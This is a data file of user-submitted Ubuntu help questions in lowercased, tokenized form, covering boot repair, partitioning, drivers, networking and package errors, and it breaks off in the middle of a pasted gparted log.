518596	which linux configuration is used my my system ?	is there any command in linux , which gives every specification of currently running linux distro , , including shell , desktop enviroment ( like gnome or kde ) , display manager ( gdm or ligthdm or kdm ) and every other minute details that system is having , similar to when we go to buy a laptop we are a given with a complete specification list , ,anything like that ?
518600	14.04 live gparted errors with ntfs partitions	i recently got a new ( ish ) computer , and i wanted to install ubuntu on it ( i use a [ outdated ] version on my main computer , so i figured it was no big deal . ) i want to dualboot , so i opened up gparted as root and tried to resize the main partition ( currently containing windows formatted in ntfs ) . it gave me this error : and did n't let me touch the partition without getting mad at me . i have the required packages for mounting ntfs partitions that it says i 'm missing , mounting the partition in nautilus and accessing it via /mount/whatever works fine , gparted is the only program to have this issue . is there a problem with my software , or is there an issue with the partition itself ? i would have tried updating a few packages , but both wired and wireless internet were broken for some reason ( never had this issue with 12.04 ) . thanks for any help you can provide .
518604	installed ubuntu 14.04.1 on dell vostro 3445 but display is jerky	i have installed ubutu 14.04.1 on dell vostro 3445 , but screen transitions , movements are jerky ( not smooth ) . what ca be the remedy ?
518609	does the desktop version have a limitation on tcp connection number ?	we have a server application in java , these days when the tcp connection number is more than 1000 , i get the error message `` too many open files '' , although i have increased the number of file descriptors available via ulimit to 10240 , this error still occurs with less than 1500 connections . i am using the ubuntu desktop version , does the desktop version have a limit on the number of tcp connections ?
518615	unable to boot to windows , boot-repair fails	i have three os on my system in dual-boot : windows 8 , linux deepin 2014 , and ubuntu 14.04 lts . somewhere along the way , booting to windows no longer worked , and some time after that , only the deepin boot worked . so i re-installed ubuntu ( because it was my main working os ) and now it works again , but windows is not booting . i tried fixing it with boot-repair but it failed , complaining : no boot loader is installed in the mbr of /dev/sda.. here 's the full report from it . now i 'm afraid to even restart because who knows if ubuntu is going to boot ... what should i do ?
518617	how to install squid proxy server on ubuntu 14.04	i want to install squid proxy server on ubuntu 14.04 desktop . i have two network cards installed in the machine . i want use one interface to receive web requests from lan ( 192.168.0.0/16 ) . i want use the other interface to connect it to the wan . i am provided with static wan ip with a mask and a gateway through a router . please help me to configure squid file as well as the network settings required for that .
518618	how do i keep juju in sync across multiple computers ?	juju is great when it 's being used on a single workstation . however i have two laptops , and a desktop that i use fairly often . if i bootstrap an environment on my desktop , i 'd like to interact with the juju environment on my laptop ( s ) . how do i do this ?
518619	disk usage analysys..	on my virtual ubuntu desktop ( hd : 300 gb ) , disk usage analyzer shows : and the df-l command shows : this is strange ! if the root consumes only 59.6 gb , how the filesystem capacity says it uses 227.4 gb ? !
518623	geforce fx5200 problem in ubuntu 12.04.5	i am new user in ubuntu and i have this problem . i can not run properly hardware geforce fx5200 in my older machine . can you write to me straight list of steps how to run properly and instal properly driver for this hw ? i know , it is older graphic card , but i would like to use it . ps : i try to more options for instal driver , but i still give bad results . windows freeze , black screen , compiz not work properly ...
518627	installing mysql-server gives 504 gateway time-out	so i have this site im coding on that requires a database and is based on php . so for this site i installed phpmyadmin that also installed mysql-server . before i installed phpmyadmin i did n't get a 504 message when i tried accessing it but after the install , i do . i 'm running this through nginx . nginx error log gives me this each time i load the site but i ca n't make anything out of it 2014/08/31 21:31:31 [ error ] 26920 # 0 : *1 upstream timed out ( 110 : connection timed out ) while reading response header from upstream , client : 127.0.0.1 , server : localhost , request : `` get / http/1.1 '' , upstream : `` fastcgi : //unix : /var/run/php5-fpm.sock '' , host : `` localhost '' if i uninstall mysql-server the problem disappears . iam running this site locally on my computer so timeout should n't be a problem . hopefully someone have gotten this error and can help me out . sorry for my english . it 's not my primary language ubuntu 14.04.1 , nginx 1.4.6 , mysql-server 5.5.38
518628	gstreamer gst-launch-1.0 : symbol lookup error : gst-launch-1.0 : undefined symbol : _gst_date_time_type	hi everyone i installed gstreamer on ubuntu and whenever i try to execute some commands in terminal i get : gst-launch-1.0 : symbol lookup error : gst-launch-1.0 : undefined symbol : _gst_date_time_type i tried to remove gstreamer-1.0 but it removes ubuntu-desktop and other applications . how can i fix this ? i mean how can i properly remove it and install latest version of gstreamer which is working ( i tried getting 1.4 but for some reason when i type gst i only see 1.0 version and 0.10 ) ? is there any tutorial for this ? also where should i start with learning about gstreamer ( i would be glad if you could point me to good resources for python ) ? thanks in advance .
518633	unable to login in phpmyadmin in ubuntu 12.04	yesterday i updated the php version to 5.5.16 and after installation i had to re-install phpmyadmin again , and after installation successfully complete , i can not login from the web browser in phpmyadmin with root user and its also not showing any error message , it also not generating anything in /var/log.mysql.log and var/log/mysql.err files
518634	how to open ports in ubuntu server 12.4 lts	how to open ports tcp 1723 / udp 1701 / udp gre 46 on ubuntu server ? note : ufw is disabled in the server . sudo iptables -l -nv gives me the following result . chain input ( policy accept 1613k packets , 510m bytes ) pkts bytes target prot opt in out source destination 0 0 accept udp -- virbr0 * 0.0.0.0/0 0.0.0.0/0 udp dpt:53 0 0 accept tcp -- virbr0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:53 0 0 accept udp -- virbr0 * 0.0.0.0/0 0.0.0.0/0 udp dpt:67 0 0 accept tcp -- virbr0 * 0.0.0.0/0 0.0.0.0/0 tcp dpt:67 chain forward ( policy accept 234k packets , 43m bytes ) pkts bytes target prot opt in out source destination 0 0 accept all -- * virbr0 0.0.0.0/0 192.168.122.0/24 state related , established 0 0 accept all -- virbr0 * 192.168.122.0/24 0.0.0.0/0 0 0 accept all -- virbr0 virbr0 0.0.0.0/0 0.0.0.0/0 0 0 reject all -- * virbr0 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable 0 0 reject all -- virbr0 * 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain output ( policy accept 1198k packets , 2328m bytes ) pkts bytes target prot opt in out source destination
518635	unable to locate package libffi and libffi5-dev on ubuntu 12.04.4 through apt-get	$ sudo apt-get install libffi libffi5-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libffi e : unable to locate package libffi5-dev another try : $ sudo apt-get install libffi5 libffi-dev reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libffi5 and $ cat /etc/issue ubuntu 12.04.4 lts \n \l what am i supposed to do now ?
518637	how to open pdf files with document viewer on ubuntu 13.10	i want open my pdf files with document viewer but i cant . i did it before but know i do n't know what is the problem . i have ubuntu 13.10.i uninstalled it and reinstall it again but it does n't work.i do n't know what is this problem
518639	connecting tata photon in x window manager using command line	due to some reason i had to shift from unity ( not 2-d as i remember ) to x window manager . so here on the desktop nothing appears ( no launcher , no menu bar nothing ) but we can open command line in it using ctrl+alt+tab . ( i have started x window manager using startx from the tty1 ) . applications can be opened using terminal ( for example the command firefox opens the firefox browser ) .now i need to connect to the internet . i have tata photon and i dont know how to connect to the internet using it . if i may know how to open the network manager using command line , i will connect tata photon with it but can it really connect to internet in x . or else can we connect to internet using command line . if yes then please tell me in detail since i have just shifted to ubuntu from windows .
518640	my mouse is suddenly very slow under ubuntu 14.04	i 'm using a i5 nuc , 8gb of ram , ssd drive and had no problems , but since 2 days the mouse is lagging and some websites behave slowly . i do n't know the reason for this . is there a way i can find out what causes this lagging ? pid benutzer pr ni virt res shr s % cpu % mem time+ command 2412 boinc 39 19 92668 50416 1344 r 66.8 0.6 42:13.23 wcgrid_mcm1_7.3 2413 boinc 39 19 92668 50416 1344 r 66.8 0.6 41:55.83 wcgrid_mcm1_7.3 2414 boinc 39 19 93328 51068 1344 r 66.5 0.6 41:58.64 wcgrid_mcm1_7.3 2415 boinc 39 19 93328 51064 1344 r 63.8 0.6 42:13.53 wcgrid_mcm1_7.3 3901 nuc 20 0 671768 20520 13492 s 2.7 0.3 0:01.72 gnome-terminal 1217 root 20 0 359508 56976 39240 s 2.3 0.7 1:05.23 xorg 1683 nuc 20 0 1080256 106012 31488 s 0.7 1.3 0:42.29 compiz 1404 nuc 20 0 519036 20260 13064 s 0.3 0.3 0:03.30 unity-panel-ser 1783 nuc 20 0 988724 66688 23188 s 0.3 0.8 0:04.18 docky 3628 root 20 0 0 0 0 r 0.3 0.0 0:00.38 kworker/1:2 1 root 20 0 33764 3104 1468 s 0.0 0.0 0:01.60 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.04 ksoftirqd/0 5 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/0:0h 7 root 20 0 0 0 0 r 0.0 0.0 0:00.69 rcu_sched 8 root 20 0 0 0 0 s 0.0 0.0 0:00.30 rcuos/0 9 root 20 0 0 0 0 s 0.0 0.0 0:00.17 rcuos/1 10 root 20 0 0 0 0 s 0.0 0.0 0:00.14 rcuos/2 11 root 20 0 0 0 0 s 0.0 0.0 0:00.12 rcuos/3 12 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcu_bh 13 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/0 14 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/1 15 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/2 16 root 20 0 0 0 0 s 0.0 0.0 0:00.00 rcuob/3 17 root rt 0 0 0 0 s 0.0 0.0 0:00.03 migration/0 18 root rt 0 0 0 0 s 0.0 0.0 0:00.01 watchdog/0 19 root rt 0 0 0 0 s 0.0 0.0 0:00.01 watchdog/1 20 root rt 0 0 0 0 s 0.0 0.0 0:00.00 migration/1 21 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/1 22 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/1:0 23 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/1:0h 24 root rt 0 0 0 0 s 0.0 0.0 0:00.01 watchdog/2 25 root rt 0 0 0 0 s 0.0 0.0 0:00.01 migration/2 26 root 20 0 0 0 0 s 0.0 0.0 0:00.02 ksoftirqd/2 27 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/2:0 28 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/2:0h 29 root rt 0 0 0 0 s 0.0 0.0 0:00.00 watchdog/3 30 root rt 0 0 0 0 s 0.0 0.0 0:00.01 migration/3 31 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/3 32 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kworker/3:0 33 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kworker/3:0h 34 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 khelper 35 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kdevtmpfs 36 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 netns 37 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 writeback 38 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kintegrityd 39 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 bioset 40 root 0 -20 0 0 0 s 0.0 0.0 0:00.01 kworker/u9:0 41 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 kblockd 42 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 ata_sff 43 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khubd 44 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 md 45 root 0 -20 0 0 0 s 0.0 0.0 0:00.00 devfreq_wq 48 root 20 0 0 0 0 s 0.0 0.0 0:00.00 khungtaskd here another one : pid benutzer pr ni virt res shr s % cpu % mem time+ command 2420 boinc 39 19 92668 50276 1288 s 68.4 0.6 2:02.31 wcgrid_mcm+ 2422 boinc 39 19 93328 50944 1308 s 68.4 0.6 2:02.62 wcgrid_mcm+ 2423 boinc 39 19 93328 50948 1308 s 68.4 0.6 2:03.88 wcgrid_mcm+ 2421 boinc 39 19 92668 50280 1288 s 66.1 0.6 2:01.20 wcgrid_mcm+ 1669 nuc 20 0 1276040 106204 31392 s 1.3 1.3 0:05.09 compiz 3016 nuc 20 0 671388 20080 13436 s 1.3 0.2 0:00.23 gnome-term+ 1226 root 20 0 353084 59380 46328 s 1.0 0.7 0:05.15 xorg 3074 nuc 20 0 30704 1764 1220 r 0.7 0.0 0:00.02 top 68 root 20 0 0 0 0 s 0.3 0.0 0:00.07 kworker/1:1 1354 nuc 20 0 23844 412 192 s 0.3 0.0 0:00.05 upstart-db+ 2926 nuc 20 0 1128472 344468 48828 s 0.3 4.3 0:22.24 firefox 1 root 20 0 swapping : nuc @ nuc : ~ $ cat /proc/swaps filename type size used priority /dev/sda3 33920 3176 1468 s 0.0 0.0 0:01.65 init 2 root 20 0 0 0 0 s 0.0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0.0 0.0 0:00.00 ksoftirqd/0 4 root 20 0 0 0 0 s 0.0 partition 8313852 0 -1 there is teamviewer showing up at times . but it says i ca n't deinstall teamviewer , because i do n't have the rights to do so ! it says this too when i try to uninstall docky , what 's going on here ? :
518644	error while loading shared libraries : libffi.so.5:	$ sudo apt-get install libffi6 libffi-dev reading package lists ... done building dependency tree reading state information ... done libffi6 is already the newest version . the following packages were automatically installed and are no longer required : gir1.2-dbusmenu-gtk-0.4 update-notifier-common gir1.2-gtk-2.0 language-pack-kde-en kde-l10n-engb language-pack-kde-en-base use 'apt-get autoremove ' to remove them . the following new packages will be installed : libffi-dev 0 upgraded , 1 newly installed , 0 to remove and 255 not upgraded . need to get 96.1 kb of archives . after this operation , 356 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ precise/main libffi-dev amd64 3.0.11~rc1-5 [ 96.1 kb ] fetched 96.1 kb in 2s ( 40.9 kb/s ) selecting previously unselected package libffi-dev . ( reading database ... 221614 files and directories currently installed . ) unpacking libffi-dev ( from ... /libffi-dev_3.0.11~rc1-5_amd64.deb ) ... processing triggers for doc-base ... processing 1 added doc-base file ... processing triggers for install-info ... processing triggers for man-db ... setting up libffi-dev ( 3.0.11~rc1-5 ) ... and then , : /opt/wunderlist-1.2.4/wunderlist-1.2.4 $ sudo ./wunderlist ./wunderlist : error while loading shared libraries : libffi.so.5 : can not open shared object file : no such file or directory more info : $ cat /etc/issue ubuntu 12.04.4 lts \n \l what am i supposed to do now ?
518658	using both kde and unity desktops on separate screens in ubuntu 14.04	i have downloaded the latest kde and installed it successfully on my ubuntu 14.04 - based pc . i can select which gui to start on login , and all seems to work very well . now what i would like to do is to launch kde on one virtual screen and unity on another virtual screen . is this possible ? in kde i can just 'rotate ' off one virtual screen into another , but i suppose that 's all under the control of the kde environment ... i can see of no way to do this short of using alt/ctrl f5 ( say ) and log in again , somehow arriving at a unity screen . can someone help me out ?
518660	is it okay to use symbolic links in my web server ?	i have the following directory setup : /var/www/html and /home/tim/website/files_here the folder html is actually a link to /home/tim/website . this means all my website files are in my home area ( they get included in the backup etc ) . is there anything wrong with this method ? is there a better way to get the homepage to be in /home/tim/website ? are symbolic links on a web server ever incompatible with users not on linux ?
518662	ssh connexion configuration	i 'm managing a several servers which are in linux . i will have others administrators who will need access to those servers in order to administrate them . so i would like to have a sort of ssh bastion which will transparently connect users to these servers via ssh from their laptop which are in windows . i donât want to copy the users public keys on my remote servers . i would like to have all the public keys of remote servers in a repository on the ssh bastion . is this possible ? if yes , what are the configurations do to to have this ?
518664	xrdp first login fails	i have configured ubuntu 14.04 with xrdp as per steps mentioned in http : //c-nergy.be/blog/ ? p=4168 with xfce desktop . it 's working perfectly ( including session resumption ) except for a problem during logging in . the first login fails with unable to connect to vnc server error , but the next time i login i get the desktop . it seems xrdp tries to connect to vnc before it 's up . is there a way to delay xrdp by 1 or 2s ?
518667	can not remove teamviewer ( no permissions )	i ca n't deinstall software anymore ( it says i have no rights to do so ) and there is a teamviewer process showing up if i use top .
518669	cant install ubuntu alongside windows 7 on hp 650 - cant recognize windows partition	i have a notebook hp 650 and i removed windows 8 to install windows 7 . i have disabled secureboot and installed win7 successfully . when i boot ubuntu live cd , the installation manager is unable to detect windows partition and it is showing all the hdd as `` unallocated '' so i have no way to resize partition and install ubuntu without destroying windows partition . same thing is happening with gparted that prompts me that cant detect if hdd is gpt or not . searching internet i found that hp notebooks have a raid controller that prevents windows to be properly detected but using the command sudo dmraid -re i get the `` no raid detected '' i have been setting dual boot frequently for friends etc but this is the first time i ca n't find a solution . the most strange is that this notebook is ubuntu certified http : //www.ubuntu.com/certification/hardware/201209-11786/
518670	my apps still `` pending review `` after 2 months of submission ?	i uploaded 2 apps for ubuntu software center but it still is showing the status of `` pending review `` . so , when can i expect it to be accepted . anyone from ubuntu or review team , please let me know
518675	first password often wrong when unlocking computer	i have a laptop with ubuntu 14.04 , when i lock my computer and try to unlock it after some time has passed ( not if i do it immediately ) the first time i try to unlock it , it will tell me that my password is wrong . when i enter my password a second time it unlocks as it should . the first few times i though that i just typed my password wrong , but since then i 've tried to type it very slowly and carefully . so i am 100 % sure that the password i enter is correct . any idea why ?
518677	lenovo power management application	i 'm considering migrating to ubuntu from windows 8 everything is fine and ready but i have one problem and if i ca n't do anything about it i should stick with windows : cry : i have a lenovo z510 notebook and as some of you may know , it has an internal battery that ca n't be removed for long time plugged-in usages but lenovo has a software for this notebook called `` power manager '' and it has an option called `` conservation mode '' and if this mode is enabled battery will be charged until it reaches 55-60 percent and then the battery charging stops and the laptop gets the electricity from the cable and as you know this option is necessary for laptops which have internal batteries . and if i ca n't do such thing in linux , my battery will be damaged after some time and this power manager application does n't have any linux versions ! so what should i do to solve this problem ? can i use for example wine to run this application in ubuntu or any other linux distros ? thank you and sorry for my bad english ! : )
518680	ca n't uninstall software using ubuntu software-center anymore	since a few days it says , that i am not allowed to deinstall software in the ubuntu software-center . i never had any problems to do so before when using my account `` nuc '' : org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.93 ' } ) : org.debian.apt.install-or-remove-packages
518681	ftp account without linux user	is it possible to create a ftp user account without a user creation in linux ?
518683	xubuntu 14.04 gsm modem connection dropping	i 'm using xubuntu 14.04 . my gsm modem ( e3131 ) keeps dropping connection randomly in intervals from 10 minutes to an hour . most of the time i just wait about 30 seconds until it is recognized by the modem manager again and i reconnect it . it did not happen before with xubuntu 13.10 . my friend installed xubuntu 14.04 and his wifi card keeps dropping connection , so i 'm thinking it must be something not hardware related . i tried a script that was meant to keep reconnecting , but it caused some other start up problems , so i prefer not to use it . does anyone know of a solution ?
518684	youtube too wide on firefox with ubuntu , but normal with windows	youtube recently changed its layout , and along with that it became much wider on firefox with ubuntu . it takes up like 90 % of the page , here 's how it looks : on windows ( same version of firefox ) , the width is normal , as it used to be . what 's going on ? ( both are 100 % zoomed . ) edit : this has been fixed in ff 32 ! i 've also noticed that the layout of the new tab page has changed since firefox started displaying the search bar there ( sure is useful to have three of those on the same page by the way , brilliant decision , firefox designers ) . on windows , the rectangular shortcuts have retain their original dimensions - they 're nice and big - but on ubuntu , they 've become much smaller .
518685	software update problem . unable to select the displayed update	what is with it ? why am i unable to select and update it ?
518687	missing operating system - windows7 - boot from usb	i am using an hp touchsmart 600 that came from factory with windows 7 home premium 64bit . i have decided to get rid of it and installed ubuntu 14.04 booting from usb and everything went perfect . now i want to install again windows 7 so i have downloaded the iso image from the web and created a bootable usb using yumi from pendrivelinux.com ( my cd/dvd does not work and i dont have original windows cd ) after reboot i keep getting this message `` missing operating system '' , then ubuntu is loaded normally . i have been solving this for several days already and tried everything in the forums but nothing worked for me : i have downloaded many different iso versions from the web to make sure the files were not corrupted . i have formatted the usb with gparted in ntfs and also in fat32 before installing the iso and i have also tried to boot in all possible usb slots to make sure i am using the primary one . i have updated the bios to boot from the usb device as a very first option . i would really appreciate someone can advise me where the problem could be so i keep trying cause so far i completely ran out of ideas . ps : pls note i am not using any partition , i just want to install windows 7 back in my machine and after that i will probably use dual-boot to keep using ubuntu . i wanted to add how the usb looks like but when i run the tree command from terminal is a very long file so just for your reference this is what i can see in the root : i have 6 folders ( boot , efi , sources , support , upgrade , yumi ) and 4 files ( autorun.inf , bootmgr , bootmgr.efi , setup.exe ) thanks for your help and please let me know if you need any extra information from my side .
518691	how can i load modules from /etc/modules before mounting local file systems ?	i have modified /etc/fstab to mount a file system that requires a custom module . on two out of three systems , all running ubuntu 14.04 , i can simply add the module to /etc/modules and it will mount the file system at boot . on the third system the boot process hangs with a prompt : an error occurred while mounting /file/system . press s to skip mounting or m for manual recovery . pressing [ m ] and running mount -a succeeds because the module has now been loaded . the problem is that , according to boot.log , the module was loaded too late . * starting mount filesystems on boot is the first entry in boot.log . it appears before * starting load modules from /etc/modules . how can i ensure modules are loaded before filesystems are mounted ? n.b . i do not wish to modify initramfs . loading the module into initramfs works but i want to know why this particular machine fails when the other two succeed and how i can fix it .
518693	repair ubuntu broken files under live ubuntu	my installed ubunut 14.04 does n't work well and after splash screen it goes to black screen , and stuck there . i know where the problem is , i have deleted a file ( this : org.gnome.settings-daemon.plugins.media-keys.gschema.xml ) from /usr/share/glib-2.0/schemas/ in the last successful login . now i want to repair that and copy/move original file into there until the problem is resolved but unfortunately i ca n't do this . i 've done these steps : boot from the live usb . mount my root partition : ( it 's on /dev/sda6 ) sudo mount /dev/sda6 /mnt bind mount some other necessary stuff : for i in /sys /proc /run /dev ; do sudo mount -- bind `` $ i '' `` /mnt $ i '' ; done chroot into my ubuntu install : sudo chroot /mnt now i am in my ubuntu root partition , original file copied in live ubunut home folder ( /home/ubunut/original_file_here ) , and destination is /usr/share/glib-2.0/schemas/ in mounted partition . i tired with this commands bellow but i get error . root @ ubunut : / # sudo mv 'org.gnome.settings-daemon.plugins.media-keys.gschema.xml ' '/usr/share/glib-2.0/schemas/' sudo : unable to resolve host ubuntu mv : can not stat 'org.gnome.settings-daemon.plugins.media-keys.gschema.xml ' : no such file or directory and root @ ubunut : / # sudo mv 'org.gnome.settings-daemon.plugins.media-keys.gschema.xml ' '/dev/sda6/usr/share/glib-2.0/schemas/' sudo : unable to resolve host ubuntu mv : failed to access '/dev/sda6/usr/share/glib-2.0/schemas/ ' : not a direcoty thanks for your help
518699	how to start apache after ioncube installation ?	i am getting the following error when trying to start the apache2 webserver after installing ioncube via the loader wizard . php fatal error : [ ioncube loader ] the loader must appear as the first entry in the php.ini file in unknown on line 0 i 've tried google answers with no luck , hoping one of the askubuntu members can provide assistance .
518700	laptop-tv sync problems in ubuntu 14.04	i am using dell inspiron n4010 laptop . recently i have upgraded from ubuntu 12.04 to ubuntu 14.04 . when i connect my laptop to my sony bravia television through hdmi cable i can see my desktop wallpaper both in laptop and tv . but after that whatever i do ( say playing a video file ) , i can see the video playing in my laptop but not in the tv monitor.but i am getting the audio . when i was using ubuntu 12.04 there was no problem.in other partition i am using windows 7 and everything is working fine windows 7 . please suggest me what to do .
518701	how do i install texworks with tlmgr ?	i 've installed texlive 2014 in a local installation using the install-tl.sh method and selected the collection collection-texworks . i expected to be able to run the texworks binary after installation , but there 's no such binary in /usr/local . also , tlmgr reports it can not find the binary . what am i doing wrong ? ⟫ tlmgr info texworks package : texworks category : tlcore shortdesc : cross-platform friendly front end . longdesc : see http : //tug.org/texworks for information and downloads . tex live includes executables only for windows . installed : yes revision : 30136 tlmgr : can not find depending packagetexworks.x86_64-linux sizes : doc : 5k , run : 14981k relocatable : no collection : collection-texworks ⟫ sudo /usr/local/texlive/2014/bin/x86_64-linux/tlmgr install texworks tlmgr : package repository http : //archive.cs.uu.nl/mirror/ctan/systems/texlive/tlnet ( nothing more , exit status 0 ) ⟫ find /usr/local -type f -name `` texworks '' ( no output ) ⟫ which texworks ( no output )
518703	ubuntu 14.4 is not supporting dell inspiron15-3537 vga card	i upgrade the my laptop ubuntu 13.4. in to 13.10 after that vga controller is not working . then i did a new clean install with the latest version of ubuntu ( 14.04 ) but the problem is still there . but it 's working finely with 13.4. but i cant update software repositories . pls help me to fix this bug .
518705	internet is not working	my wifi shows connected . but when i try to open the router page or access internet it does not work.the internet is working on windows 7 but not on ubuntu 14 . 04 i only recently installed ubuntu .
518706	ssd crash randomly	full disclosure - i 'm actually running mint ( 17 qiana 64bit ) , but i 'm hoping you guys will be able to help anyway . it 's a fresh install on a new laptop ( dell n5110 ) with a new crucial mx100 ssd and twice now the whole system has frozen up . if i switch to a text terminal ( as in ctrl-alt-f1 ) and attempt to login i get the message end_request : i/o error , dev sda , sector xxxxxxxxx i 've run both the short offline and extended offline tests from gsmartcontrol , and both have come back completed without error . the firmware on my ssd is mu01 , i ca n't find anything on crucial which says whether or not there 's a firmware update available . any ideas what i should look at next ? is the ssd faulty ? driver issue ? laptop issue ? firware issue ? do n't really know where to start ... . thanks in advance grichiec
518707	unable to connect to the internet - password authenication panel keeps appearing	i am using ubuntu 14.04 . i was web surfing earlier today without any issues - just like i have done for ages . i get back to my computer 4 or 5 hours later and a panel appears asking for authentication for my wi-fi network - a password is required to access my internet account with my isp . i re-enter the password correctly but the panel keeps appearing asking for the same password . i rebooted my computer 3 ot 4 times and the same thing occurs . my computer is a dual boot device so i booted windows 7 and was able to connect to the internet . i then rebooted with ubuntu and the authentication panel keeps appearing and i am unable to connect to the internet . can anyone please offer a suggestion on how to overcome this problem ?
518709	trying to install ubuntu 14.04 but getting the message `` not a bootable disc ''	this is on an acer aspire v5 ( amd 64-bit ) with windows 8.1 pre-installed . have disabled secure boot and fast start-up ; have tried with uefi but it does n't even try to boot from usb-hdd or usb-fdd in that mode , it just launches windows ; have tried in legacy mode but getting the message `` not a bootable disc '' : i have the .iso image on the usb drive - do i need to unzip the files for them to be recognised ?
518710	separate terminal windows for input and output streams	how do i use different xterm or terminal windows for input and output streams while programming in c++ such that i enter input in one terminal window and get output in another window ?
518711	how to enable https support for curl in 14.04 ?	i have a `` curl '' program installed on ubuntu 14.04 server . unfortunately , it does not support https . i have googled this problem and found a suggestion to replace `` curl '' package with `` curl-ssl '' , but `` apt-get '' can not find it . i definitely do not want to compile it by myself . help me , please . here is my curl -v output : curl 7.37.1 ( x86_64-unknown-linux-gnu ) libcurl/7.37.1 libssh2/1.4.3 protocols : dict file ftp gopher http imap pop3 rtsp scp sftp smtp telnet tftp features : ipv6 largefile upd i have found file /usr/local/bin/curl , which is always 7.37 , it does not depend of package installed via apt-get upd whereis curl : curl : /usr/bin/curl /usr/local/bin/curl /usr/share/man/man1/curl.1.gz
518717	does purging an application prevent its reinstallation ?	if i 'm using purge to remove something , will i be able to reinstall that thing after if i want or it 's somehow blocks that option in the future ?
518721	grub rescue need help ?	i installed windows 8 and then i install ubuntu 14.04 in windows 8 by mistake delete windows 8 system reserved memory then the error shows in boot no such partition system enters in rescue mode how i can solve this error ?
518722	gparted ca n't create partition/partition table:	i am doing this with usb 2.0 flash drive 8gb . here is what i am doing : open gparted : then i am trying to create new partition and i 've god this message : after that i am going to device/create partition table and i am clicking aply : then i am trying again to create a new partition and the same error : this is gparted console log : ====================== libparted : 2.3 ====================== ( gpartedbin:3854 ) : glib-critical ** : source id 7 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 6 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 26 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 25 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 31 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 30 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 36 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 35 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 39 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 38 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 42 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 41 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 47 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 46 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 50 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 49 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 55 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 54 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 58 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 57 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 219 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 218 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 301 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 300 was not found when attempting to remove it /dev/sdb : unrecognised disk label /dev/sdb : unrecognised disk label ( gpartedbin:3854 ) : glib-critical ** : source id 756 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 755 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 762 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 761 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 770 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 769 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 773 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 772 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 776 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 775 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 779 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 778 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 784 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 783 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 787 was not found when attempting to remove it ( gpartedbin:3854 ) : glib-critical ** : source id 786 was 